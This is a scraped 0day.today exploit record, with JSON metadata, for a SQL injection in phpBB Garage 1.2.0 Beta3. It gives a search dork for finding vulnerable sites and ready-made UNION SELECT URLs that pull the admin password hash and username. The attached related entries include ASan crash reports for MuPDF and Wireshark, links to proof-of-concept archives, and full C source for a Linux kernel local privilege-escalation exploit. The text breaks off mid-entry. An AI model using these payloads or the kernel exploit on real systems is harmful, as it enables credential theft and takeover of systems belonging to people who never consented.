ID 1337DAY-ID-2336
Type zdt
Reporter maku234
Modified 2007-12-03T00:00:00
Description
Exploit for unknown platform in category web applications
===========================================================
phpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability
===========================================================
Title: phpBB Garage v1.2.0 - Beta3 Remote SQL Injection Vulnerability
Dork: "Powered By phpBB Garage 1.2.0"
Author: maku234
garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/*
garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/*
# 0day.today [2018-01-05] #
{"hash": "ac4eaeb1c409e902e27c521cb7a04ef6941c2c68c713605c7da182cda18a4efc", "id": "1337DAY-ID-2336", "lastseen": "2018-01-05T09:13:10", "viewCount": 18, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "3768662ec9d94f4fe9328f047bf2e171", "key": "href"}, {"hash": "ebef0da5733dce975a1369dd478bcf6e", "key": "modified"}, {"hash": "ebef0da5733dce975a1369dd478bcf6e", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "11971c35737e6e5ba3c2a921b09a9c9c", "key": "reporter"}, {"hash": "6efe6c8e521f1538f2568ac0bba5f989", "key": "sourceData"}, {"hash": "cd4df05ce17beeff90023c7f368cf1ee", "key": "sourceHref"}, {"hash": "9ff9291a9dd0a45919c4f34ecae9d1cd", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-27911", "1337DAY-ID-25850", "1337DAY-ID-25706", "1337DAY-ID-25704"]}, {"type": "exploitdb", "idList": ["EDB-ID:39004", "EDB-ID:33824", "EDB-ID:29316", "EDB-ID:29290"]}, {"type": "nessus", "idList": ["ALA_ALAS-2014-368.NASL", "FEDORA_2014-7426.NASL", "FEDORA_2014-7430.NASL", "OPENSUSE-2012-288.NASL", "FEDORA_2014-5609.NASL", "FEDORA_2014-5235.NASL", "PHP_CGI_REMOTE_CODE_EXECUTION.NASL", "MANDRIVA_MDVSA-2012-068.NASL"]}, {"type": "f5", "idList": ["SOL15677"]}, {"type": "cve", "idList": ["CVE-2014-4014"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS"]}, {"type": "redhat", "idList": ["RHSA-2012:1045"]}], "modified": "2018-01-05T09:13:10"}, "vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/2336", "description": "Exploit for unknown platform in category web applications", "title": "phpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability", "history": [{"bulletin": {"hash": "6a5bee798e00be760179beb3a8efe9252046ad49235d5965057e34f82546c071", "id": "1337DAY-ID-2336", "lastseen": "2016-04-19T23:33:55", "enchantments": {"score": {"value": 6.0, "modified": "2016-04-19T23:33:55"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ebef0da5733dce975a1369dd478bcf6e", "key": "modified"}, {"hash": "49d0661551d4de5d11bfd2a91e0ab25e", "key": "href"}, {"hash": "11971c35737e6e5ba3c2a921b09a9c9c", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "9ff9291a9dd0a45919c4f34ecae9d1cd", "key": "title"}, {"hash": "b115d07801c2f2ee8d5f5f8d33cfbad0", "key": "sourceHref"}, {"hash": "8c0f29019458cd9bd19574af86db93a2", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "ebef0da5733dce975a1369dd478bcf6e", "key": "published"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/2336", "description": "Exploit for unknown platform in category web applications", "viewCount": 7, "title": "phpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "===========================================================\r\nphpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability\r\n===========================================================\r\n\r\n\r\n\r\nTitle: phpBB Garage v1.2.0 - Beta3 Remote SQL Injection Vulnerability\r\nDork: \"Powered By phpBB Garage 1.2.0\"\r\n\r\nAuthor: maku234\r\n\r\n\r\n\r\ngarage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/*\r\ngarage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/*\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2007-12-03T00:00:00", "references": [], "reporter": "maku234", "modified": "2007-12-03T00:00:00", "href": "http://0day.today/exploit/description/2336"}, "lastseen": "2016-04-19T23:33:55", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "===========================================================\r\nphpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability\r\n===========================================================\r\n\r\n\r\n\r\nTitle: phpBB Garage v1.2.0 - Beta3 Remote SQL Injection Vulnerability\r\nDork: \"Powered By phpBB Garage 1.2.0\"\r\n\r\nAuthor: maku234\r\n\r\n\r\n\r\ngarage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/*\r\ngarage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/*\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "published": "2007-12-03T00:00:00", "references": [], "reporter": "maku234", "modified": "2007-12-03T00:00:00", "href": "https://0day.today/exploit/description/2336"}
{"zdt": [{"lastseen": "2018-03-01T19:39:28", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2017-06-08T00:00:00", "published": "2017-06-08T00:00:00", "href": "https://0day.today/exploit/description/27911", "id": "1337DAY-ID-27911", "title": "Artifex MuPDF mujstest 1.10a - Null Pointer Dereference Vulnerability", "type": "zdt", "sourceData": "Source: http://seclists.org/oss-sec/2017/q1/458\r\n \r\nDescription:\r\nMujstest, which is part of mupdf is a scriptable tester for mupdf + js.\r\n \r\nA crafted image posted early for another issue, causes a stack overflow.\r\n \r\nThe complete ASan output:\r\n \r\n# mujstest $FILE\r\n==32127==ERROR: AddressSanitizer: stack-buffer-overflow on address \r\n0x7fff29560b00 at pc 0x00000047cbf3 bp 0x7fff29560630 sp 0x7fff2955fde0\r\nWRITE of size 1453 at 0x7fff29560b00 thread T0\r\n #0 0x47cbf2 in __interceptor_strcpy /tmp/portage/sys-devel/llvm-3.9.1-\r\nr1/work/llvm-3.9.1.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:548\r\n #1 0x50e903 in main /tmp/portage/app-text/mupdf-1.10a/work/mupdf-1.10a-\r\nsource/platform/x11/jstest_main.c:358:7\r\n #2 0x7f68df3c578f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-\r\nr3/work/glibc-2.23/csu/../csu/libc-start.c:289\r\n #3 0x41bc18 in _init (/usr/bin/mujstest+0x41bc18)\r\n \r\nAddress 0x7fff29560b00 is located in stack of thread T0 at offset 1056 in \r\nframe\r\n #0 0x50c45f in main /tmp/portage/app-text/mupdf-1.10a/work/mupdf-1.10a-\r\nsource/platform/x11/jstest_main.c:293\r\n \r\n This frame has 7 object(s):\r\n [32, 1056) 'path'\r\n [1184, 2208) 'text' <== Memory access at offset 1056 partially underflows \r\nthis variable\r\n [2336, 2340) 'w' <== Memory access at offset 1056 partially underflows \r\nthis variable\r\n [2352, 2356) 'h' <== Memory access at offset 1056 partially underflows \r\nthis variable\r\n [2368, 2372) 'x' <== Memory access at offset 1056 partially underflows \r\nthis variable\r\n [2384, 2388) 'y' <== Memory access at offset 1056 partially underflows \r\nthis variable\r\n [2400, 2404) 'b' 0x1000652a4160:[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 \r\nf2 f2\r\n 0x1000652a4170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1000652a4180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1000652a4190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1000652a41a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1000652a41b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==32127==ABORTING\r\n \r\nAffected version:\r\n1.10a\r\n \r\nFixed version:\r\nN/A\r\n \r\nCommit fix:\r\nN/A\r\n \r\nCredit:\r\nThis bug was discovered by Agostino Sarubbo of Gentoo.\r\n \r\nCVE:\r\nCVE-2017-6060\r\n \r\nReproducer:\r\nhttps://github.com/asarubbo/poc/blob/master/00147-mupdf-mujstest-stackoverflow-main\r\n \r\nTimeline:\r\n2017-02-05: bug discovered and reported to upstream\r\n2017-02-17: blog post about the issue\r\n2017-02-17: CVE assigned via cveform.mitre.org\r\n \r\nNote:\r\nThis bug was found with Address Sanitizer.\r\n \r\nPermalink:\r\nhttps://blogs.gentoo.org/ago/2017/02/17/mupdf-mujstest-stack-based-buffer-overflow-in-main-jstest_main-c\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42139.zip\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/27911"}, {"lastseen": "2017-12-31T23:14:58", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2016-02-24T00:00:00", "published": "2016-02-24T00:00:00", "href": "https://0day.today/exploit/description/25850", "id": "1337DAY-ID-25850", "title": "Wireshark - vwr_read_s2_s3_W_rec Heap Based Buffer Overflow", "type": "zdt", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=647\r\n \r\nThe following crash due to a heap-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==5869==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001e95c at pc 0x0000004c1386 bp 0x7fff8c82cbf0 sp 0x7fff8c82c3a0\r\nWRITE of size 1425 at 0x61b00001e95c thread T0\r\n #0 0x4c1385 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393\r\n #1 0x9c8ab0 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1614:5\r\n #2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20\r\n #3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10\r\n #4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7\r\n #5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12\r\n #6 0x52c1df in main wireshark/tshark.c:2197:13\r\n \r\n0x61b00001e95c is located 0 bytes to the right of 1500-byte region [0x61b00001e380,0x61b00001e95c)\r\nallocated by thread T0 here:\r\n #0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40\r\n #1 0x7f1f907a8610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)\r\n #2 0x83fff6 in wtap_open_offline wireshark/wiretap/file_access.c:1105:2\r\n #3 0x53214d in cf_open wireshark/tshark.c:4195:9\r\n #4 0x52bc7e in main wireshark/tshark.c:2188:9\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy\r\nShadow bytes around the buggy address:\r\n 0x0c367fffbcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffbce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffbcf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffbd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffbd10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c367fffbd20: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa\r\n 0x0c367fffbd30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffbd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffbd50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffbd60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffbd70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==5869==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11795. Attached are three files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39490.zip\n\n# 0day.today [2017-12-31] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25850"}, {"lastseen": "2018-04-04T15:36:06", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2015-12-16T00:00:00", "published": "2015-12-16T00:00:00", "id": "1337DAY-ID-25706", "href": "https://0day.today/exploit/description/25706", "type": "zdt", "title": "Wireshark - find_signature Stack Based Out-of-Bounds Read", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=643\r\n \r\nThe following crash due to a stack-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==3901==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffeadbc852d at pc 0x0000009cea23 bp 0x7ffeadbbf650 sp 0x7ffeadbbf648\r\nREAD of size 1 at 0x7ffeadbc852d thread T0\r\n #0 0x9cea22 in find_signature wireshark/wiretap/vwr.c:2214:17\r\n #1 0x9c5066 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1435:15\r\n #2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20\r\n #3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10\r\n #4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7\r\n #5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12\r\n #6 0x52c1df in main wireshark/tshark.c:2197:13\r\n \r\nAddress 0x7ffeadbc852d is located in stack of thread T0 at offset 32813 in frame\r\n #0 0x9bbbcf in vwr_process_rec_data wireshark/wiretap/vwr.c:2320\r\n \r\n This frame has 1 object(s):\r\n [32, 32800) 'rec' <== Memory access at offset 32813 overflows this variable\r\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\r\n (longjmp and C++ exceptions *are* supported)\r\nSUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/wiretap/vwr.c:2214:17 in find_signature\r\nShadow bytes around the buggy address:\r\n 0x100055b71050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x100055b71060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x100055b71070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x100055b71080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x100055b71090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x100055b710a0: 00 00 00 00 f3[f3]f3 f3 f3 f3 f3 f3 f3 f3 f3 f3\r\n 0x100055b710b0: f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3\r\n 0x100055b710c0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x100055b710d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x100055b710e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x100055b710f0: f1 f1 f1 f1 04 f2 04 f3 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==3901==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11791. Attached are two files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39004.zip\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/25706"}, {"lastseen": "2018-01-01T05:02:44", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2015-12-16T00:00:00", "published": "2015-12-16T00:00:00", "id": "1337DAY-ID-25704", "href": "https://0day.today/exploit/description/25704", "type": "zdt", "title": "Wireshark - getRate Stack Based Out-of-Bounds Read", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=641\r\n \r\nThe following crash due to a stack-based out-of-bounds memory read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==2067==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe26462c20 at pc 0x0000009cf704 bp 0x7ffe26462b70 sp 0x7ffe26462b68\r\nREAD of size 4 at 0x7ffe26462c20 thread T0\r\n #0 0x9cf703 in getRate wireshark/wiretap/vwr.c:2276:20\r\n #1 0x9c74f7 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1533:25\r\n #2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20\r\n #3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10\r\n #4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7\r\n #5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12\r\n #6 0x52c1df in main wireshark/tshark.c:2197:13\r\n \r\nAddress 0x7ffe26462c20 is located in stack of thread T0 at offset 160 in frame\r\n #0 0x9cf32f in getRate wireshark/wiretap/vwr.c:2261\r\n \r\n This frame has 6 object(s):\r\n [32, 80) 'canonical_rate_legacy'\r\n [112, 144) 'canonical_ndbps_20_ht'\r\n [176, 208) 'canonical_ndbps_40_ht' <== Memory access at offset 160 underflows this variable\r\n [240, 276) 'canonical_ndbps_20_vht'\r\n [320, 360) 'canonical_ndbps_40_vht'\r\n [400, 440) 'canonical_ndbps_80_vht'\r\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\r\n (longjmp and C++ exceptions *are* supported)\r\nSUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/wiretap/vwr.c:2276:20 in getRate\r\nShadow bytes around the buggy address:\r\n 0x100044c84530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x100044c84540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x100044c84550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x100044c84560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x100044c84570: f1 f1 f1 f1 00 00 00 00 00 00 f2 f2 f2 f2 00 00\r\n=>0x100044c84580: 00 00 f2 f2[f2]f2 00 00 00 00 f2 f2 f2 f2 00 00\r\n 0x100044c84590: 00 00 04 f2 f2 f2 f2 f2 00 00 00 00 00 f2 f2 f2\r\n 0x100044c845a0: f2 f2 00 00 00 00 00 f3 f3 f3 f3 f3 00 00 00 00\r\n 0x100044c845b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x100044c845c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x100044c845d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==2067==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11789. Attached are three files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39006.zip\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25704"}, {"lastseen": "2018-04-09T07:43:08", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2014-06-22T00:00:00", "published": "2014-06-22T00:00:00", "id": "1337DAY-ID-22363", "href": "https://0day.today/exploit/description/22363", "type": "zdt", "title": "Linux Kernel <= 3.13 - Local Privilege Escalation PoC (gid)", "sourceData": "/**\r\n * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC\r\n *\r\n * Vitaly Nikolenko\r\n * http://hashcrack.org\r\n *\r\n * Usage: ./poc [file_path]\r\n *\r\n * where file_path is the file on which you want to set the sgid bit\r\n */\r\n#define _GNU_SOURCE\r\n#include <sys/wait.h>\r\n#include <sched.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n#include <limits.h>\r\n#include <string.h>\r\n#include <assert.h>\r\n \r\n#define STACK_SIZE (1024 * 1024)\r\nstatic char child_stack[STACK_SIZE];\r\n \r\nstruct args {\r\n int pipe_fd[2];\r\n char *file_path;\r\n};\r\n \r\nstatic int child(void *arg) {\r\n struct args *f_args = (struct args *)arg;\r\n char c;\r\n \r\n // close stdout\r\n close(f_args->pipe_fd[1]);\r\n \r\n assert(read(f_args->pipe_fd[0], &c, 1) == 0);\r\n \r\n // set the setgid bit\r\n chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);\r\n \r\n return 0;\r\n}\r\n \r\nint main(int argc, char *argv[]) {\r\n int fd;\r\n pid_t pid;\r\n char mapping[1024];\r\n char map_file[PATH_MAX];\r\n struct args f_args;\r\n \r\n assert(argc == 2);\r\n \r\n f_args.file_path = argv[1];\r\n // create a pipe for synching the child and parent\r\n assert(pipe(f_args.pipe_fd) != -1);\r\n \r\n pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args);\r\n assert(pid != -1);\r\n \r\n // get the current uid outside the namespace\r\n snprintf(mapping, 1024, \"0 %d 1\\n\", getuid());\r\n \r\n // update uid and gid maps in the child\r\n snprintf(map_file, PATH_MAX, \"/proc/%ld/uid_map\", (long) pid);\r\n fd = open(map_file, O_RDWR); assert(fd != -1);\r\n \r\n assert(write(fd, mapping, strlen(mapping)) == strlen(mapping));\r\n close(f_args.pipe_fd[1]);\r\n \r\n assert (waitpid(pid, NULL, 0) != -1);\r\n}\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22363"}], "exploitdb": [{"lastseen": "2017-06-08T02:13:54", "bulletinFamily": "exploit", "description": "Artifex MuPDF mujstest 1.10a - Null Pointer Dereference. CVE-2017-6060. Dos exploit for Linux platform", "modified": "2017-02-17T00:00:00", "published": "2017-02-17T00:00:00", "id": "EDB-ID:42139", "href": "https://www.exploit-db.com/exploits/42139/", "type": "exploitdb", "title": "Artifex MuPDF mujstest 1.10a - Null Pointer Dereference", "sourceData": "Source: http://seclists.org/oss-sec/2017/q1/458\r\n\r\nDescription:\r\nMujstest, which is part of mupdf is a scriptable tester for mupdf + js.\r\n\r\nA crafted image posted early for another issue, causes a stack overflow.\r\n\r\nThe complete ASan output:\r\n\r\n# mujstest $FILE\r\n==32127==ERROR: AddressSanitizer: stack-buffer-overflow on address \r\n0x7fff29560b00 at pc 0x00000047cbf3 bp 0x7fff29560630 sp 0x7fff2955fde0\r\nWRITE of size 1453 at 0x7fff29560b00 thread T0\r\n #0 0x47cbf2 in __interceptor_strcpy /tmp/portage/sys-devel/llvm-3.9.1-\r\nr1/work/llvm-3.9.1.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:548\r\n #1 0x50e903 in main /tmp/portage/app-text/mupdf-1.10a/work/mupdf-1.10a-\r\nsource/platform/x11/jstest_main.c:358:7\r\n #2 0x7f68df3c578f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-\r\nr3/work/glibc-2.23/csu/../csu/libc-start.c:289\r\n #3 0x41bc18 in _init (/usr/bin/mujstest+0x41bc18)\r\n\r\nAddress 0x7fff29560b00 is located in stack of thread T0 at offset 1056 in \r\nframe\r\n #0 0x50c45f in main /tmp/portage/app-text/mupdf-1.10a/work/mupdf-1.10a-\r\nsource/platform/x11/jstest_main.c:293\r\n\r\n This frame has 7 object(s):\r\n [32, 1056) 'path'\r\n [1184, 2208) 'text' <== Memory access at offset 1056 partially underflows \r\nthis variable\r\n [2336, 2340) 'w' <== Memory access at offset 1056 partially underflows \r\nthis variable\r\n [2352, 2356) 'h' <== Memory access at offset 1056 partially underflows \r\nthis variable\r\n [2368, 2372) 'x' <== Memory access at offset 1056 partially underflows \r\nthis variable\r\n [2384, 2388) 'y' <== Memory access at offset 1056 partially underflows \r\nthis variable\r\n [2400, 2404) 'b' 0x1000652a4160:[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 \r\nf2 f2\r\n 0x1000652a4170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1000652a4180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1000652a4190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1000652a41a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1000652a41b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==32127==ABORTING\r\n\r\nAffected 